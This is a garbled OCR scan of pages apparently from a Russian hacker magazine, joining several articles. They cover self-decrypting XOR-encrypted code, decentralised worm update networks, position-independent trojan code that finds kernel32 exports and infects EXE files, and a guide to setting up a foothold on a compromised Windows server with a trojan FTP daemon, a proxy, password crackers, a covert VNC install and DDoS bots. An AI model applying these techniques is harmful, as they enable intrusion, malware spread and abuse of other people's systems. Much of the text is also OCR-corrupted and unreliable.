Для успешной расшисфровки процедуры нам 
необходимо определить стартовый адрес ее 
размещения в памяти. 
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маркеры Ha вершину и дно функции, 
но не трогай ее тело! 

Выбор алгоритма шифрования неп- 
ринципиален. Кто-то использует XOR, 
кто-то тяготеет к DES или RSA. Естест- 
венно, XOR ломается намного проще, 
особенно если длина ключа невелика. 
Однако в примере, приведенном ни- 
же, мы остановимся именно на ХОК, 
поскольку DES и RSA крайне громозд- 
ки и совершенно ненаглядны. 

Откомпилировав эту программу 
обычным образом (например, "cl.exe 
/с FileName.C"), мы получим объект- 
ный файл FileName.obj. Теперь нам 
необходимо скомпоновать исполняе- 
мый файл, предусмотрительно отк- 
лючив защиту кодовой секции от за- 
писи. В линкере Microsoft Link за это 
отвечает ключ /SECTION, за которым 
идет имя секции и назначаемые ей 
атрибуты, например, "link.exe 
FileName.obj /FIXED 
/SECTION:.text, ERW". Здесь: /FIXED - 
ключ, удаляющий перемещаемые 
элементы (мы ведь помним, что пере- 
мещаемые элементы необходимо 
удалять), ".text" - имя кодовой сек- 
ции, а "ЕБМ/" - это первые буквы 
Executable, Readable, Writable, хотя 
при желании Executable можно и 
опустить - на работоспособность 
срайла это никак не повлияет. Дру- 
гие линкеры используют свои ключи, 
описание которых можно найти в 90- 
кументации. Имя кодовой секции не 
всегда совпадает с ".text", поэтому, 
если у тебя что-то не получается, ис- 
пользуй утилиту MS DUMPBIN для 
выяснения конкретных обстоя- 
тельств. 

Сформированный линкером сфайл 
пока не пригоден для запуска, ведь 
защищенная сфрункция еще не за- 
шифрована! Чтобы ее зашифровать, 
запустим HIEW, переключимся в НЕХ- 
режим и запустим контекстный поиск 
маркерной строки (<F7>, "КРМС", 
<«ЕМТЕБ>). Вот она! (см. рис. 6). Теперь 
остается лишь зашифровать все, что 
расположено внутри маркеров 
"КРМС". Нажимаем <F3> и переходим в 
режим редактирования, затем давим 
<F8> и задаем маску шифрования (в 
данном случае она равна 66h). Каж- 
goe последующее нажатие на <F8> за- 
шифровывает один байт, перемещая 


Рис. 8. Классический метод вызова функций делает код неперемещаемым 


Выбор алгоритма шифрования 
непринципиален. Кто-то использует XOR, 
кто-то тяготеет к DES или RSA. 


курсор по тексту. <F9> сохраняет из- 
менения на диске. После того как 
файл будет зашифрован, потреб- 
ность в маркерах отпадает, и при же- 
лании их можно затереть бессмыслен- 
ным кодом, чтобы защищенная про- 
цедура поменьше бросалась в глаза. 

Вот теперь наш срайл готов к выпол- 
нению. Запускаем его и... он, понятное 
дело, отказывает в работе. Что ж, пер- 
вый блин всегда комом, особенно ес- 
ли тесто замешено на самомодифици- 
рующемся коде. Призвав на помощь 
отладчик, здравый смысл и дизассе- 
мблер, попытаемся определить, что 
именно мы сделали не так. 

Добившись успеха, загрузим ис- 
полняемый файл в IDA РКО и пос- 
мотрим, как выглядит зашифрован- 
ная функция. 

Естественно, заклятье наложенной 
шифровки легко снять (опытные ха- 
керы сделают это, даже не выходя из 
IDA PRO), так что не стоит переоце- 
нивать свою защищенность. К тому 
же, защита кодовой секции от запи- 
си была придумана неслучайно, и ее 
отключение разумным действием не 
назовешь. 

АР!-функция VirtualProtect позво- 
ляет манипулировать атрибутами 
страниц по нашему усмотрению. С 
ее помощью мы можем присваивать 
атрибут Writeable только тем страни- 
цам, которые реально нуждаются в 
модификации, и сразу же после 3a- 
вершения расшифровки отбирать 
его обратно. 

Обновленный вариант функции 
crypt_it может выглядеть так: 


crypt_it(unsigned char *p, int с) 


Защита кодовой секции OT записи была 
придумана неслучайно, и ее отключение 
разумным действием не назовешь. 


Рис. 9. Вызов функций по указателям, переданным через аргумент, обеспечивает ко- 
ду перемещаемость 
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{ 

int a; 

// отключаем защиту от записи 

VirtualProtect(p, с, PAGE_READWRITE, 
(DWORD*) ба); 

// расшифровываем функцию 

for (а = 0; a< с; а++) *р++ “= 0x66; 

// восстанавливаем защиту 

VirtualProtect(p, с, PAGE_READONLY, 
(DWORD*) ба); 

} 


Откомпилировав файл обычным об- 
разом, зашиофруй его по методике, 
описанной выше, и запусти на выпол- 
нение. Будем надеяться, что он зара- 
ботает с первого раза. 


ПРОБЛЕМЫ ОБНОВЛЕНИЯ 
КОДА ЧЕРЕЗ ИНТЕРНЕТ 

m Техника самомодисфикации тесно 
связана с задачей автоматического 
обновления кода через интернет. Ре- 
шение этой задачи требует обширных 
знаний и инженерного мышления. Вот 
неполный перечень подводных кам- 
ней, с которыми нам придется столк- 
нуться: 

и как встроить двоичный код в ис- 
полняемый файл? 

ш как оповестить все экземпляры 
удаленной программы о сфакте обнов- 
ления? 

№ как защититься от поддельных об- 
новлений? 

По-хорошему эта тема требует от- 
дельной книги, здесь же мы лишь 
очертим проблему. 

Начнем с того, что концепции мо- 
дульного и процедурного программи- 
рования (без которых сейчас никуда) 
нуждаются в определенных механиз- 
мах межпроцедурного взаимодей- 
ствия. По меньшей мере, одна проце- 
дура должна уметь вызывать другую 
(см. рис. 8): 

Что здесь неправильно? А вот что. 
Функция рипИ находится вне функ- 
ции my_func, и ee адрес наперед неиз- 
вестен. В обычной жизни эту задачу 
решает линкер, однако мы же не со- 
бираемся встраивать его в обновляе- 
мую программу, верно? Поэтому необ- 
ходимо разработать собственный ме- 
ханизм импорта/экспорта всех необ- 
ходимых функций. 

В простейшем случае будет доста- 
точно передать нашей функции ука- 
затели на все необходимые ей функ- 


ции как аргументы, тогда она не будет привязана к своему 
местоположению в памяти и станет полностью перемеща- 
ема (см. рис. 9). Глобальные и статические переменные и 
константные строки использовать запрещается (компиля- 
тор размещает их в другой секции). Также необходимо 
убедиться, что компилятор в порядке проявления 
собственной инициативы не впендюрил в код никакой OT- 
себятины наподобие вызова срункций, контролирующих 
границы стека на предмет переполнения. Впрочем, в боль- 
шинстве случаев такая инициатива легко отключается че- 
рез ключи командной строки, описанные в прилагаемой к 
компилятору документации. 

Откомпилировав полученный файл, мы должны скомпо- 
новать его в 32-разрядный бинарник. Далеко не каждый 
линкер способен на такое, и зачастую двоичный код выди- 
рается из исполняемого cpaiina любым подручным НЕХ-ре- 
дактором (например, тем же HIEW'om). 

Теперь мы имеем готовый модуль обновления, имеем об- 
новляемую программу. Остается только добавить первое 
ко второму. Поскольку Windows блокирует запись во все 
исполняющиеся в данный момент файлы, обновить сам се- 
бя файл не может и эту операцию приходится выполнять в 
несколько стадий. Сначала исполняемый сфайл, условно 
обозначенный нами как А, переименовывает себя в В (пе- 
реименованию запущенных файлов Windows не мешает), 
затем файл В создает свою копию под именем А, дописы- 
вает модуль обновления в его конец как оверлей (более 
опытные хакеры могут скорректировать значение поля 
ImageSize), после чего завершает свое выполнение, пере- 
давая бразды правления срайлу А, удаляющему времен- 
ный файл В с диска. Разумеется, это не единственно воз- 
можная схема и, кстати говоря, далеко не самая лучшая из 
всех, но на первых порах сойдет и она. 

Более актуальным представляется вопрос распростране- 
ния обновлений по интернету. Но почему бы просто не 
выкладывать обновления на такой-то сервер? Пусть уда- 
ленные приложения (например, те же черви) периодически 
посещают его, вытягивая свежачок... Ну и сколько такой 
сервер просуществует? Если он не рухнет под натиском 
бурно размножающихся червей, его закроет разъяренный 
администратор. Поэтому тут необходимо действовать стро- 
го по распределенной схеме. 

Простейший алгоритм выглядит так: пусть каждый червь 
сохраняет в своем теле IP-agpeca заражаемых машин. Тог- 
да "родители" будут знать своих "детей", а "дети" помнить 
"родителей". Впрочем, обратное утверждение неверно. 
"Дедушки" и "бабушки" знают лишь своих непосредствен- 
ных "детей", но не имеют никакого представления о «вну- 
ках», если, конечно, «внуки» явным образом не установят 
с ними соединение и не сообщат свои адреса... Главное - 
рассчитать интенсивность обмена информацией так, чтобы 
не сожрать весь сетевой трасрик. Тогда, обновив одного 
червя, мы сможем достучаться и до всех остальных, при- 
чем противостоять этому будет очень и очень непросто. 
Распределенная система обновлений не имеет единого ко- 
ординационного центра и, даже будучи уничтоженной на 
99,999%, сохраняет свою работоспособность. 

Правда, для борьбы с червями может быть запущено 
обновление-камикадзе, автоматически уничтожающее 
всех червей, которые успели его заголить. Поэтому прог- 
рессивно настроенные вирусописатели активно исполь- 
зуют механизмы цифровой подписи и несимметричные 
криптоалгоритмы. Если лень разрабатывать свой 
собственный движок, можно использовать РСР (благо ее 
исходные тексты открыты). 

Главное, иметь идеи и уметь держать компилятор с от- 
ладчиком в руках. Все остальное - вопрос времени. 


ЭТО BCE? 

и Без притока новых идей техника самомодификации об- 
речена на медленную смерть. Чтобы поддержать ее на пла- 
ву, необходимо найти правильную точку применения сил, 
используя самомодифицирующийся код там и только там, 
где его действительно нужно использовать! 
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ВИРУСНЫЕ ТЕХНОЛОГИИ В ТРОЯНАХ 


же привыкли, что троян - это отдельный файл, который стартует из автозагрузки. Мало кому известно, что 
загрузчик трояна (или весь троян) может быть оформлен в виде адресно-независимого кода. Переносимый код 
прописывается в чужой EXE или DLL - заражает точно так же, как это делают вирусы. 


аразив нужный ЕХЕ, 


троян может не све- 


титься в автозагрузке 


или вообще не иметь 
отдельного срайла, ес- 
ли пропишется в этот EXE полностью. 
Подобные техники называют вирус- 
НЫМИ. 


ДВЕ ПРОБЛЕМЫ АДРЕСНО- 
НЕЗАВИСИМОГО КОДА 

m Итак, код трояна нужно сделать 
адресно-независимым. Для того что- 
бы этот код нормально ‹ункциони- 
ровал, требуется решить несколько 
проблем. Вирусописателям они хоро- 
шо известны, но неопытный троян- 
мейкер может столкнуться с ними 
впервые. 

Проблема первая. Неизвестно, где 
окажется код трояна, заразив EXE. 
Поэтому, как только код получит уп- 
равление, он должен будет узнать ag- 
рес своего начала. Чаще всего ис- 
пользуется бородатый (но стопроце- 
нтно рабочий) прием, который был по- 
пулярен еще во времена DOS: 


_trojan_code_start: ; начало кода трояна 


call $5 call на следующую 
инструкцию 

рор ебр ; вытолкнем из стека 
адрес инструкции pop ebp 

sub ebp, 5 ; теперь в ebp адрес 


_trojan_code_start 


Проблема вторая. Нужно научиться 
вызывать API. У обычного приложе- 
ния трудностей с этим не возникает - 
нормальный ЕХЕ-файл имеет табли- 
цу импорта. В ней, кроме всего про- 
чего, указано, какие АР! требуются 
программе и куда нужно записать их 
адреса (система это делает еще при 
загрузке). 

Поскольку адресно-независимый 
код трояна не имеет таблицы импор- 
та, ему нужно как-то узнать эти ад- 
реса самому. Вирусописатели знают 
несколько способов нахождения 
API. Самый надежный из них - ана- 
лиз таблицы экспорта kernel32.dll. 
Не будем приводить полный исход- 
ник процедуры, которая это делает, 
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а упомянем лишь общие принципы и 
некоторые сведения о формате 
Portable EXE (РЕ). 


КАК ДОБРАТЬСЯ 
ДО ТАБЛИЦЫ ЭКСПОРТА? 

ш Большинство EXE и DLL - это PE- 
файлы (kernel32.dll - не исключение). 
Все они имеют следующую структуру. 
РЕ-файл начинается со stub'a. Stub - 
это ЕХЕ-программа, работающая под 
MS DOS. Начинается с сигнатуры - 
двух байт 'MZ! или (что бывает очень 
редко) 'ZM'. Stub получает управле- 
ние, если EXE запущен под DOS'om. 
Обычно он имеет небольшой размер 
и выводит "This program requres 
Microsoft Windows", после чего завер- 
шает работу. В DLL stub просто для 
красоты. В своем заголовке по смеще- 
нию 3Ch stub содержит dword - КУА 
РЕ-заголовка. 

После stub'a идет, собственно, 
Windows-nporpamma. Она начинается с 
заголовка РЕ. Первые четыре байта 
заголовка образуют сигнатуру 
'P','E',0,0 или (почти не встречается) 
'Е'!Р',О,0. Заголовок имеет довольно 
сложную структуру, из которой нас 
интересуют лишь некоторые элемен- 
ты. В частности, RVA таблицы экспор- 


STUB 


Portable EXE 


| Общая структура РЕ-файла 


та находится по смещению 78h от сиг- 
натуры РЕ (если считать, что сама сиг- 
натура имеет смещение 0). 


В таблице экспорта интересны сле- 
дующие элементы. По смещению 20h 
от начала таблицы экспорта лежит 
dword - RVA массива указателей на 
О-терминирующие строки с именами 
экспортируемых API. По смещению 
24h лежит еще один интересный 
dword - RVA массива ординалов. Ор- 
динал - это обычное двухбайтовое 
слово (зачем нужны ординалы, CMOT- 
ри ниже). И по смещению 1Ch лежит 
RVA массива адресов API. 


НАХОДИМ АР! ПО ИМЕНИ 

и Для того чтобы найти АР! по име- 
ни, нужно сделать несколько шагов. 

@. Прочитать первые два байта ker- 
nel32.dll. Убедиться, что там 'MZ'. Про- 
читать RVA заголовка РЕ. Прочитать 
первые четыре байта заголовка РЕ. 
Убедиться, что там 'РЕ',0,0. 

@. По смещению 78h от сигнатуры 
РЕ прочитать RVA таблицы экспорта. 
@. Найти в таблице экспорта RVA 
массива имен, ординалов и адресов. 
@. Перебрать массив имен, найти 
имя нужной АР! и запомнить ее ин- 

декс (номер по порядку). 

@. Посмотреть, какой ординал ле- 
жит по этому же индексу в массиве 
ординалов. Вычесть из этого ордина- 
ла базу ординалов - dword, Haxoga- 
щийся в таблице экспорта по смеще- 
нию 10h. 

@. Используя число (полученное в 
предыдущем пункте) в качестве ин- 
декса, прочитать из массива адресов 
RVA нужной API. Вот зачем нам была 
нужна таблица ординалов! 


Ш Спешу разочаровать любителей передирать исходники один в 
один - полностью функционального загрузчика трояна (и уж тем 
более самого трояна) здесь не будет. Это, во-первых, противоза- 


KOHHO, а во-вторых, просто скучно. Но будут две интересные техни- 
ки: традиционная и нетрадиционная - обе с рабочими процедурами 
на диске, который прилагается к журналу. 


НАХОДИМ KERNEL32.DLL 
В ПАМЯТИ 

Но надо сначала добраться go 
kernel32.dll. Kernel32.dll при запуске 
программы отображается в ее ag- 
ресном пространстве. И надо сде- 
лать вот что: 


Ф. Найти точку внутри образа 
kernel32.dll в памяти. Для этого нужно 
пройтись по цепочке $ЕН до ее пос- 
леднего элемента. 

Код, реализующий нахождение точ- 
ки внутри kernel32.dll, выглядит так: 


@. Выравнять найденный адрес точки 
внутри kernel32.dll Ha 64K. Память в 
Windows организована таким образом, 
что образы исполняемых модулей (и не 
только они: любое резервирование па- 
мяти в виртуальном адресном простра- 
нстве процесса происходит по адресу, 
кратному 64K - это так называемая allo- 
cation granularity - прим. AvaLANche'a) 
загружаются по адресам, кратным 64K. 
Если по выравненному адресу не лежит 
'MZ', уменьшим его Ha 64K и повторим 
проверку. И так до тех пор, пока не най- 


Потом находим RVA PE, а дальше 
все по плану :). 


НЕСКОЛЬКО СЛОВ 

0 ВНЕДРЕНИИ 

В "ЧУЖУЮ" ПРОГРАММУ 
Допустим, удалось написать ag- 

ресно-независимый код. Как теперь 

заразить им чужой ЕХЕ? Вирмейкеры 

знают кучу разных техник. Те, что 

попроще, легко секутся антивируса- 


RVA - 
ми. Сложные техники - труднее прог- Relative vir- 
tuall 
раммировать. Нева 
К сложным техникам традиционно смещение 
относят сжатие секции кода. Секция охносителея 
но начала 
кода - это, грубо говоря, та часть РЕ- файла. 


файла, в которой находится програм- 
мный код. Суть техники в следую- 
щем. Находим RVA и размер секции 
кода - они лежат по смещениям 2Ch 
и 1Ch от начала РЕ-заголовка. Также 


Полное опи- 
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дем "голову" kernel32.dll. нас интересует RVA точки входа - ле- ЗАО 
жит в РЕ-заголовке по смещению смотри в 
281. Именно в точку входа передает- доках. Со- 
ветуем ту- 
ся управление сразу после старта ториал 
ЕХЕ (если это ЕХЕ-файл) или загруз- Iczelion'a и 
доку Hard 
ки DLL (если это DLL). Winesdam'a.« 
Адресно-независимый код внедряет- все это есть 


ся следующим образом. Секция кода на 
www.wasm.ru 
сжимается с помощью какого-нибудь 
алгоритма (типа LZW). В результате 
этого освобождается немного места в 
конце кодовой секции - именно туда и 
прописывается переносимый код, пе- 
реводя К\/А точки входа в РЕ-заго- 


на русском 
языке. 


py — а ловке на себя. Длина заражаемого Пример 
й | процедур 
файла при этом не увеличивается! о. 
; A Kak это сделать? Очень просто! Не щих Native 
= НИ ` = = надо писать собственную процедуру АР! для 
| pen aap reasons сжатия дан- 
| робити = be ain ны сжатия. Можно воспользоваться тем, ных, есть 
| что в Ntdll.dil есть следующие функ- на habe K 
: а журналу. 
ции Native API: RtICompressBuffer, Процедуру 
RtIGetCompressionWorkSpaceSize и декомпрес- 
RtIDecompressBuffer. Они позволяют ее ра 


сжимать и декомпрессировать данные 
с помощью алгоритма LZ. Se 


wn 
= 
о 
a 
z 
= 
< 
= 
< 
Е - 
< 
- 
< 


WINDOWS - ПРИТОН ХАКЕРА ) 


Докучаев Дмитрий aka Forb (forb@real.xakep.ru) 


ПРИТОН ХАКЕРА — 


a 


КАК СОЗДАЮТ ПЛАЦДАРМ HA ВЗЛОМАННОЙ МАШИНЕ 


сем известно, что возможности форточного cmd.exe не сравнятся с прелестями /bin/bash. По этой причине 
взломщики не жалуют консоль Windows. На самом деле, даже используя юзерские привилегии, можно организовать 


на чужой машине хороший хакерский плацдарм. 


икто не помешает взла- 


мывать пароли, ис- 


пользовать прокси, 


ставить графические 
приложения на мощ- 
ной тачке. Достаточно иметь неко- 
торые консольные навыки и обла- 

дать контрольным пакетом хакерс- 
ких программ. 

Предположим, что у нас имеется 
доступ к бэкдору, который сидит на 
определенном порту. После коннекта 
и авторизации троянец запустит 
cmd.exe под правами SYSTEM. Но 
скучный ста со стандартными утили- 
тами малоинтересен. Но это только на 
первый взгляд! 

Перед тем как что-то устанавливать, 
нам понадобится хороший ЕТР-сервер 
(чтобы без проблем закачивать нуж- 
ный собрт). Конечно, можно скачивать 
сфрайлы с помощью ЕТР-сценариев 
или старого ТЕТР-протокола, но луч- 
ше раз и навсегда обзавестись хаке- 
рским демоном, например, проверен- 
ным Phantom FTP Server. Этот троян 
функционирует в двух режимах: с 
привязкой к коноригу или с привязкой 
к реестру. Полное описание этой чуд- 
ной программы находится на сайте 
phantom-server.chat.ru. Там выложен ap- 
хив PFS.zip, из него на взломанный 
сервер закачаем ехе'шник. Теперь 
запускаем PFS (не забыв понезамет- 
ней переименовать бинарник). Mo3g- 
равляю: стал доступен ЕТР-сервер на 
2177-м порту. Теперь можно коннек- 
титься туда со своей машины и про- 
верять работу демона. Если Phanton 
был запущен без конорига, он пустит 
кого угодно под любым логином и па- 
ролем. В принципе, так даже удоб- 
нее: ведь можно без проблем убить 
процесс после того, как нужный 
брайл закачан. 

Теперь, когда у нас есть ЕТР-доступ и 
командный интерпретатор, можно зали- 
вать и запускать хакерские утилиты. 


ХАЛЯВНЫЙ И БЕЗОПАСНЫЙ 
ПРОКСИ 

и Взломщики, которые заботятся о 
своей безопасности, любят устанав- 
ливать на взломанные *nix-Tayku ле- 
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чебно-охранительный сост и часто 
незаслуженно забывают охватить 
своей заботой дырявые Windows- 
сервера. В ведьпод Винду существу- 
ет хороший софт, позволяющий ор- 
ганизовывать безопасные соедине- 
ния, туннели и перенаправления. 
Досточно поставить всего одну ути- 
литу, и можно забыть о проблемах. 
Встречаем сосфтину bouncer (security- 
lab.ru/_tools/bouncer-1.0.rc6-win32.zip), KOTO- 
рая изменит твое представление о 
скучном командном шелле. Прежде 
чем заливать эту утилиту на сервер, 
стоит поработать с ней на локаль- 
ной машине. Запустим ее без пара- 
метров. Как видно, софтинка имеет 
туеву хучу опций. Совсем не обяза- 
тельно указывать их все, но для 
уверенности в завтрашнем дне надо 
ознакомиться со способами приме- 
нения хотя бы половины параметров 
из этого списка. 

Начнем с главных опций. Перед за- 
пуском необходимо определить ре- 
жим Боипсега. Он может запускаться 
в качестве редиректора или в качест- 
ве прокси. Первый режим пригодится, 
если нужно временно присоединиться 
к какому-нибудь серверу. Например, у 
взломщика нет желания светить 
собственный IP-agpec, но очень хочет- 
ся прителнетиться на Www.white- 


house.gov:22 :). Нет проблем! Ему нуж- 
но просто запустить bouncer с опция- 
ми --port 22 --destination www.white- 
house.gov:22, a затем соединиться с 
сервером, где стоит прокси (в качест- 
ве порта надо указать 22). С таким же 
успехом можно похвастаться своим 
элитным хостом в IRC, скрывать ис- 
тинный IP в аське и т.д. 

Если же целью будет использовать 
настоящие пятые соксы ($ОСК$5), то 
необходимо запустить bouncer во 
втором режиме, а еще лучше - в ка- 
честве демона. Для этого нужно 
снабдить программу тремя главными 
параметрами: 


bouncer.exe --port 1080 --socks5 --dae- 
mon. 


Но это самый простой случай. В сети 
вертится масса сканеров на прокси, 
поэтому наш сокс могут обнаружить 
злые хакеры. Поэтому нужно дове- 
риться параметрам, ограничивающим 
доступ к сервису. Рассмотрим пример 
запуска bouncer'a с разрешением сое- 
динения только с доверенными адре- 
сами и по определенному логину: 


bouncer.exe --port 1080 --socks5 --dae- 
mon --allow 195.64.6.* --s_user x4k30r -- 
s_password x4ck. 


228 ICS FIP Server ready. 


bass iirSapt 


Е cw command successful 
ced c 


= 58 command successfull, 
ch 

pos ry failed. Invalid directory name =ynilas 
a : 

250 С№ command successful . 


391 ро иней for nosuchuser . 

=== Шаг пои on ыиыый in. 

Е ШИТЕ Туре: 18 Internet Component Suite 
es fTERPY” 15 current directory. 

e:/ TEMP" 


“cif” Gs corrend directory. 


“f:f" as current directory. 


“ecf” is current directory, 


15 current directory. 


Кроме этого, можно создать защи- 
щенное $$[-соединение с поддерж- 
кой аутентификации по паролю. Для 
этого в командную строку стоит доба- 
вить три опции: 


bouncer.exe с аЧуапсед-опциями. При- 
мерно так: 


Но и это еще не все. Разработчики 
bouncer'’a здорово позаботились о мо- 
ниторинге. Никто не мешает вести лог 
всех соединений и иметь доступ к ag- 
министративному серверу. После сое- 
динения с ним станет возможно ли- 
цезреть все активные подключения, а 
также зверски замочить Боипсег :). 
Чтобы добиться всего вышеперечис- 
ленного, следует запускать Для удобства эту команду можно за- 
писать в какой-нибудь bat-cpann, а ge- 


* 2 статы eee bed) БМВ 


мон запускать через утилиту start (в 
background'e), чтобы старт Боипсег"а 
не оказался последней операцией в 
консоли (для дальнейших действий 

придется создать новый сеанс). 


СКАЖИ «ПАРОЛЬ»! 

Что делает взломщик, когда доби- 
вается локальных прав в Linux? Пра- 
вильно, смотрит информацию о систе- 
ме, а затем ставии John The Ripper gna 
перебора парольных хэшей. Но редко 
кому приходит в голову запустить 
Джоника на Win-nnatqpopme. А зря! Ec- 
ли процессор мощный, грех не исполь- 
зовать его ресурсы по назначению. Но 
прежде чем что-то устанавливать, не- 
обходимо выяснить частоту процессо- 
ра. Эта процедура выполняется с по- 


мощью одной консольной команды. 


КОНСОЛЬНЫЕ ПОМОЩНИКИ 


Вся информация о железе хранится 
в специальном разделе реестра 
HKEY_LOCAL_MACHINE\HARDWARE. 
Там же записана подробная инфра о 
проце. Сведения лежат в ветке 
«HKEY_LOCAL_MACHINE\HARD- 
WARE\DESCRIPTION\System\CentralPr 
ocessor\O», которую нужно каким-то 
образом экспортировать в файл. Де- 
лается это простой командой: regedit 
/е cpu.reg 
HKEY_LOCAL_MACHINE\HARD- 
WARE\DESCRIPTION\System\Central 
Processor\O. После этого нужно вы- 
полнить type сри.гед, которая выдаст 
сокровенные данные о CPU. 

Портированный Джоник находится 
здесь: : 
Прежде чем заливать сфайл, надо ска- 
чать его к себе на компьютер, а затем 
собрать все необходимые библиотеки 
и ехе'шники в шпионский каталог. 
Синтаксис виндового Джоника ничем 
не отличается от пингвиньего, поэто- 
му не буду рассказывать о парамет- 
рах запуска переборщика (при жела- 
нии их можно найти в файле 
doc\EXAMPLE). Не исключено, что 
придется обзавестись парой-тройкой 
увесистых BOPGNUCTOB, чтобы перебор 
был более продуктивным :). 


Процедура 
инсталля- 
ции 
RAdmin'a на 
взломанную 
Windows- 
систему 
очень похо- 
жа на уста- 
новку VNC. 
Правда, 
УМС кушает 
немного 
меньше ре- 
сурсов, чем 
его главный 
конкурент. 


Изучи все 
ключики к 
команде 
regedit. Это 
пригодится 
для прове- 
дения шпи- 
онских опе- 
раций. 
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Теперь Хакер 
комплектуется 


О\МО-диском 


Выбери сам: DVD или 2 CD! | 


Охлади свой комп 
Жидкостные системы охлаждения. 


Дефейс по-правильному! 
Ликбез по совершению дефейсов. 


DDoS в картинках 


Создание собственной О)о5-армии. 


<Точкару> принимает гостей 
Наши в гостях у крупного 
столичного провайдера. 


На наших дисках ты 
всегда найдешь тонну 
самого свежего софта, 
демки, музыку, атакже 
2 видео по взлому! 


~ = | i 


(game)land, 


www. xakep.ru 
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Что я слышу? Ты говоришь, что 
Джон не умеет ломать хэши MySQL, a, 
кроме красивого MD5Inside, ты ничего 
не знаешь? Конечно, порой без гра- 
фики не обойтись, но в данной ситуа- 
ции логичнее обратиться за помощью 
к полезной утилите табсгаск 
(onli >A, Faciic С НА р )5 ke ). 
Программа не только переберет нуж- 
ный хэш, но и попытается найти кол- 
лизию (совпадение одного и того же 
пароля в разных хэшах), которые 
очень часто встречаются в MD5. 

Если переборщик запускается на ко- 
роткое время (весь процесс перебора 
будет наблюдаться в консоли), можно 
использовать программу без пере- 
направлений. Когда есть подозрения, 
что брутфорс затянется на долгие 
дни, можно стартовать утилиту с пере- 
направлением в лог, а также в back- 
дгочпа-режиме (с помощью Start). В 
любом случае, никто не мешает при- 
бить процесс при помощи стандарт- 
ной утилиты tskill. 


ДАЕШЬ ГРАФИКУ! 

| А как быть в случае, если очень 
хочется запустить полноцветное гра- 
фическое приложение? Естественно, 
что в консоли хакеру никогда He go- 
биться старта какого-нибудь Brutus 
или PuTTY. Но ничего не мешает пос- 
тавить на сервер \/МС, а затем наслаж- 
даться мониторингом рабочего стола. 

RealVNC - проект, аналогичный 

RAdmin. Он служит для управления 
Windows через специальный viewer, 


который целиком и полностью пока- 
зывает рабочий стол взломанного 
сервера. К сожалению, VNC коррект- 
но установится только при наличии 
административных привилегий. Если 
их еще нет, можно попробовать вос- 
пользоваться локальным эксплоитом 
nog WinNT. 

ay о пакет RealVNC су 

| (там а заре- 
AGT pUDORETUES): Он поставляется в 
виде отдельного инсталлятора, что 
плохо, ведь из консоли таким сетап- 
ником не поуправлять... Но это лишь 
на первый взгляд: стоит проделать 
ряд нехитрых действий, и демон VNC 
благополучно установится на желае- 
мый сервер. 

Первым делом ставим RealVNC на 
свою машину. Когда инсталлятор поп- 
росит указать директорию, вводим ка- 
кой-нибудь малозаметный путь (имен- 
но в эту папку сервис будет установ- 
лен на удаленной машине). Снимаем 
все галочки, которые заставят VNC 
прописаться в качестве сервиса - нам 
это не нужно. По окончании работы 
инсталлера запускаем срайл vnc- 
config.exe. В первом разделе необходи- 
мо задать пароль на вход и нажать 
кнопку ОК. 

Теперь переходим к изнурительно- 
му процессу экспорта всех данных на 
чужую машину. Открываем реестр и 
ищем все ключи с подстрокой \/МС. 
Бережно копируем названия разде- 
лов в отдельный документ - они еще 
пригодятся! Ради эксперимента для 
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Расшифруем без проблем! 


БДЯЩИЙ АНТИВИРУС 


спешно установленный VNC 


ленивых я пропарсил свой реестр на 
предмет таких разделов (я не гаранти- 
рую их полное сходство с твоими вет- 
ками!). Вот они: 


HKEY_USERS\S-1-5-21-329068152- 
484763869-839522115- 
500\Software\RealVNC 

HKEY_CURRENT_USER\Software\Microsoft\ 
Windows\CurrentVersion\Applets\Regedit 

HKEY_CURRENT_USER\Software\RealVNC 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsof 
t\Windows\CurrentVersion\Uninstall\RealVN 
С 151 

HKEY_USERS\S-1-5-21-329068152- 
484763869-839522115- 
500\Software\Microsoft\Windows\CurrentVe 
rsion\Applets\Reedit 

HKEY_USERS\S-1-5-21-329068152- 
484763869-83952 2115- 
500\Software\RealVNC 


Теперь запускаем команду regedit /e 
1.гед НАЗВАНИЕ_ПЕРВОГО_РАЗДЕЛА. 
Когда с первой вкладкой будет покон- 
чено, экспортируем вторую в файл 
2.гед. И так go конца. Программисты 
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Злые боты атаковали интернет! 


Microsoft не позаботились о том, что- 
бы regedit понимал несколько веток в 
одной командой строке, поэтому рабо- 
та может показаться нудной :). Когда 
вся информация окажется экспорти- 
рована, составляем из нескольких ин- 
формационных документов один- 
единственный упс.гед. Благодаря тому 
что все данные представлены в текс- 
товом виде, у тебя не возникнет проб- 
лем со склеиванием сфайлов. 

Вроде бы все готово к переносу. 
Создаем на удаленном сервере ката- 
лог, в точности совпадающий с тем, 
который мы вписали в окно инсталля- 
тора. Теперь синхронизируем эти ди- 
ректории. Остался последний шаг - 
импорт данных реестра. Ведь vnc- 
config записал пароль в специальную 
ветку. Но не все так плохо, ведь мы 
только что экспортировали все дан- 
ные по продукту VNC. Закачиваем 
упс.гед на машину, а затем запускаем 
regedit c параметрами «/з vnc.reg». 
Опция /s помогает избежать запроса 
на добавление (подумай, как можно 
нажать ОК в консоли? :)). Таким вот 
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образом важные данные попадают в 
удаленный реестр. Теперь ничто не 
мешает запустить vncwin4.exe на yga- 
ленном сервере. 

Настало время проверить проделан- 
ную работу: стартуем vncviewer.exe и 
указываем хост сервера с нулевым 
портом (например, 195.55.55.55:0), за- 
тем вводим нужный пароль и видим 
полноэкранный графический интер- 
фейс. Теперь можно работать с сер- 
вером с помощью клавиатуры и мы- 
ши, а также запускать ресурсоемкий 
графический собрт! 


АТАКА БОТАМИ 

ш Я совсем не упомянул про DoS-ata- 
ки. Ведь многие хакеры ищут дырявые 
машины, чтобы поставить на них спе- 
циальный боевой сост. В наше время 
большую популярность набирают так 
называемые «боты». Бот - это не прос- 
то робот, сидящий в IRC. Хакерские бо- 
ты отличаются интеллектом. Они уме- 
ют размножаться, осыпать жертву 
'СМР-запросами и $УМ/АСК-пакетами, 
искать баги в интернете, подключать 
плагины и многое другое. Хакеру дос- 
таточно запустить один-единственный 
срайл, и тут же бот распакует себя, 3a- 
пустит скрытый MIRC, приконнектится 
к нужному серверу и будет ждать ко- 
MaHg хозяина. Кстати, прежде чем 
опознать хозяина, бот попросит у него 
сложный пароль и потребует совпаде- 
ния хоста и идента. 

Что касается поиска багов и самора- 
змножения, то тут все просто. Вероят- 
но, ты знаешь, что такое авторутер. 
Точно такой же механизм интегриро- 
ван в обычного п!ВС-бота. По требо- 
ванию хозяина запускается сканер, 
ищущий баг в DCOM/Isass-cepBucax (а 
